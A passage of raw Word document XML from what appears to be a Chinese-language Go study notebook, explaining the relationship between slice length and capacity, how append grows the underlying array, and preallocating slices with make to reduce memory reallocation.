    <w:p w14:paraId="3396AFEC" w14:textId="77777777" w:rsidR="005626A2" w:rsidRDefault="005626A2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E7D19E" w14:textId="77777777" w:rsidR="005626A2" w:rsidRDefault="005626A2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C745C0" w14:textId="76616EEA" w:rsidR="009C7C0C" w:rsidRDefault="005626A2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCBA7AA" w14:textId="12E90304" w:rsidR="00350078" w:rsidRDefault="00350078" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10257B9C" w14:textId="22A3F9B7" w:rsidR="005626A2" w:rsidRDefault="005626A2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我想了一下，这里</w:t>
      </w:r>
      <w:r w:rsidR="0020341E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的写法直接</w:t>
      </w:r>
      <w:r w:rsidR="0020341E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidR="0020341E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就可以</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEE4841" w14:textId="77777777" w:rsidR="00350078" w:rsidRDefault="00350078" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="399E439A" w14:textId="5767EA4D" w:rsidR="00EC0228" w:rsidRDefault="00EC0228" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="295" w:name="_Toc159779755"/>
      <w:r>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>en</w:t>
      </w:r>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cap</w:t>
      </w:r>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的关系</w:t>
      </w:r>
      <w:bookmarkEnd w:id="295"/>
    </w:p>
    <w:p w14:paraId="42B9E12B" w14:textId="37C117F8" w:rsidR="00EC0228" w:rsidRDefault="00EC0228" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05C15845" w14:textId="071794CF" w:rsidR="00EC0228" w:rsidRDefault="00492F58" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00492F58">
        <w:t>https://blog.csdn.net/weixin_45449681/article/details/106872075</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4694B942" w14:textId="223198ED" w:rsidR="00EC0228" w:rsidRDefault="00EC0228" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06D2F436" w14:textId="77777777" w:rsidR="009F6DB3" w:rsidRDefault="009F6DB3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65EF5F0E" w14:textId="77777777" w:rsidR="009F6DB3" w:rsidRDefault="009F6DB3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00852521">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>容量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是指底层</w:t>
      </w:r>
      <w:r w:rsidRPr="00852521">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>数组的大小</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00852521">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>长度</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指</w:t>
      </w:r>
      <w:r w:rsidRPr="00852521">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>可以使用的大小</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C48FF1" w14:textId="77777777" w:rsidR="009F6DB3" w:rsidRPr="009F6DB3" w:rsidRDefault="009F6DB3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54CBAFD6" w14:textId="2E0EF0AD" w:rsidR="00EC0228" w:rsidRDefault="00FA4D2B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00852521">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>数组的长度是固定不变的</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA4D2B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，而</w:t>
      </w:r>
      <w:r w:rsidRPr="00852521">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>切片的长度是可变的</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA4D2B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA4D2B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>它会随着切片的数据增长而增大，但是不会随着数据减少而减小。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1E2651" w14:textId="443FAD05" w:rsidR="00EC0228" w:rsidRDefault="00EC0228" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59DD6AA3" w14:textId="256FA73D" w:rsidR="00EC0228" w:rsidRDefault="00FA4D2B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA4D2B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>make</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA4D2B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义后，</w:t>
      </w:r>
      <w:r w:rsidRPr="00852521">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>没有指定</w:t>
      </w:r>
      <w:r w:rsidRPr="00852521">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cap</w:t>
      </w:r>
      <w:r w:rsidRPr="00852521">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的大小的时候</w:t>
      </w:r>
      <w:r w:rsidRPr="00852521">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>len</w:t>
      </w:r>
      <w:r w:rsidRPr="00852521">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00852521">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cap</w:t>
      </w:r>
      <w:r w:rsidRPr="00852521">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>是相等的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B067D5F" w14:textId="16C2708F" w:rsidR="00EC0228" w:rsidRDefault="00FA4D2B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00852521">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>定义</w:t>
      </w:r>
      <w:r w:rsidRPr="00852521">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cap</w:t>
      </w:r>
      <w:r w:rsidRPr="00852521">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>后，</w:t>
      </w:r>
      <w:r w:rsidRPr="00852521">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>len</w:t>
      </w:r>
      <w:r w:rsidRPr="00852521">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00852521">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cap</w:t>
      </w:r>
      <w:r w:rsidRPr="00852521">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的值就不相等了。但是</w:t>
      </w:r>
      <w:r w:rsidRPr="00852521">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cap</w:t>
      </w:r>
      <w:r w:rsidRPr="00852521">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>定义的值要大于</w:t>
      </w:r>
      <w:r w:rsidRPr="00852521">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>len</w:t>
      </w:r>
      <w:r w:rsidRPr="00852521">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的值，</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA4D2B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>否则就会报错。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009142FD" w14:textId="77777777" w:rsidR="004E3132" w:rsidRDefault="004E3132" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50A1AAB7" w14:textId="0939918B" w:rsidR="00EC0228" w:rsidRDefault="001F777D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="001F777D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认情况下切片</w:t>
      </w:r>
      <w:r w:rsidRPr="001F777D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cap</w:t>
      </w:r>
      <w:r w:rsidRPr="001F777D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>值小于</w:t>
      </w:r>
      <w:r w:rsidRPr="001F777D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1024</w:t>
      </w:r>
      <w:r w:rsidRPr="001F777D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的时候是成倍数增长的。比如有</w:t>
      </w:r>
      <w:r w:rsidRPr="001F777D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="001F777D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>变为</w:t>
      </w:r>
      <w:r w:rsidRPr="001F777D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="001F777D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在变为</w:t>
      </w:r>
      <w:r w:rsidRPr="001F777D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="001F777D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>……但是超过</w:t>
      </w:r>
      <w:r w:rsidRPr="001F777D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1024</w:t>
      </w:r>
      <w:r w:rsidRPr="001F777D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后就变为原切片的</w:t>
      </w:r>
      <w:r w:rsidRPr="001F777D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.25</w:t>
      </w:r>
      <w:r w:rsidRPr="001F777D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>倍。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5294C849" w14:textId="77777777" w:rsidR="006C1699" w:rsidRDefault="006C1699" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30D48D42" w14:textId="77777777" w:rsidR="006C1699" w:rsidRDefault="006C1699" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>容量的用处在哪？在与当你</w:t>
      </w:r>
      <w:r w:rsidRPr="00852521">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:r w:rsidRPr="00852521">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> appen d</w:t>
      </w:r>
      <w:r w:rsidRPr="00852521">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>扩展长度时，如果新的长度小于容量，不会更换底层数组，否则，</w:t>
      </w:r>
      <w:r w:rsidRPr="00852521">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">go </w:t>
      </w:r>
      <w:r w:rsidRPr="00852521">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>会新申请一个底层数组，拷贝这边的值过去，把原来的数组丢掉。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也就是说，</w:t>
      </w:r>
      <w:r w:rsidRPr="00852521">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>容量的用途是：在数据拷贝和内存申请的消耗与内存占用之间提供一个权衡</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653BF6AA" w14:textId="77777777" w:rsidR="006C1699" w:rsidRDefault="006C1699" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EC60B39" w14:textId="2B323902" w:rsidR="00EC0228" w:rsidRDefault="006C1699" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而长度，则是为了帮助你限制切片可用成员的数量，提供边界查询的。所以用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> make </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>申请好空间后，需要注意不要越界【越</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> len </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269A420A" w14:textId="786B4CA0" w:rsidR="00EC0228" w:rsidRDefault="00EC0228" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47679594" w14:textId="73535B9E" w:rsidR="00035F3D" w:rsidRPr="00035F3D" w:rsidRDefault="00035F3D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00035F3D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>总结：</w:t>
      </w:r>
      <w:r w:rsidRPr="00035F3D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>len</w:t>
      </w:r>
      <w:r w:rsidRPr="00035F3D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>要超过</w:t>
      </w:r>
      <w:r w:rsidRPr="00035F3D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cap</w:t>
      </w:r>
      <w:r w:rsidRPr="00035F3D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的话，系统会自己重新分配内存，然后</w:t>
      </w:r>
      <w:r w:rsidRPr="00035F3D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cap</w:t>
      </w:r>
      <w:r w:rsidRPr="00035F3D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>会变大。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8F67D0" w14:textId="67F9DAAD" w:rsidR="00D658E7" w:rsidRDefault="00D658E7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7747184E" w14:textId="58282D05" w:rsidR="00D658E7" w:rsidRDefault="00535E76" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关于数组未声明长度导致内存重新分配</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18540A7C" w14:textId="3CDB8FA4" w:rsidR="002D69F2" w:rsidRDefault="00CC65BB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>golang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中切片建立在使用数组的基础上。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B3A403" w14:textId="5EA7D96F" w:rsidR="002D69F2" w:rsidRDefault="002D69F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="684D6910" w14:textId="18F8FD91" w:rsidR="002D69F2" w:rsidRDefault="00E07C4F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C8263D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>切片下面一定有数组。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23245774" w14:textId="3B32B915" w:rsidR="00E07C4F" w:rsidRDefault="00793698" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果你定义的时候是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C8263D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r w:rsidRPr="00C8263D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> v []string </w:t>
      </w:r>
      <w:r w:rsidRPr="00C8263D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>这种的切片</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，那么你如果</w:t>
      </w:r>
      <w:r w:rsidRPr="00C8263D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>循环使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00C8263D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C8263D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>v = append(v, element)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C8263D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>时，则内存分配会一次一下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>benchmark</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试中可以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>benchmem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看到这个情况。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F33AEA" w14:textId="21DF96DE" w:rsidR="00793698" w:rsidRDefault="00793698" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19AB8E7B" w14:textId="5AF9F4A8" w:rsidR="00C8263D" w:rsidRDefault="00C8263D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数组是会初始化长度的，切片不需要。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EE5A77" w14:textId="77777777" w:rsidR="00C8263D" w:rsidRDefault="00C8263D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26B4E9B1" w14:textId="3003E580" w:rsidR="00793698" w:rsidRDefault="00EB7157" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果你一下子</w:t>
      </w:r>
      <w:r w:rsidRPr="00C8263D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>声明数组再使用切片，如</w:t>
      </w:r>
      <w:r w:rsidRPr="00C8263D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> make</w:t>
      </w:r>
      <w:r w:rsidRPr="00C8263D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>([]string, length, cap)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00C8263D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>内存只会分配一次，循环使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00C8263D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>v = append(v, element)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C8263D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>时内存不会每次都得重新分配</w:t>
      </w:r>
      <w:r w:rsidR="000D0E90" w:rsidRPr="00C8263D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>一</w:t>
      </w:r>
      <w:r w:rsidRPr="00C8263D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E76D0F" w14:textId="204FA82D" w:rsidR="00E07C4F" w:rsidRPr="00793698" w:rsidRDefault="00E07C4F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AF38404" w14:textId="77777777" w:rsidR="00E07C4F" w:rsidRPr="002D69F2" w:rsidRDefault="00E07C4F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="565A41F5" w14:textId="5FA13E2D" w:rsidR="002D69F2" w:rsidRDefault="002D69F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E582FA2" w14:textId="4058DFDD" w:rsidR="002D69F2" w:rsidRDefault="005D1442" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数组的实际长度取决于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>l</w:t>
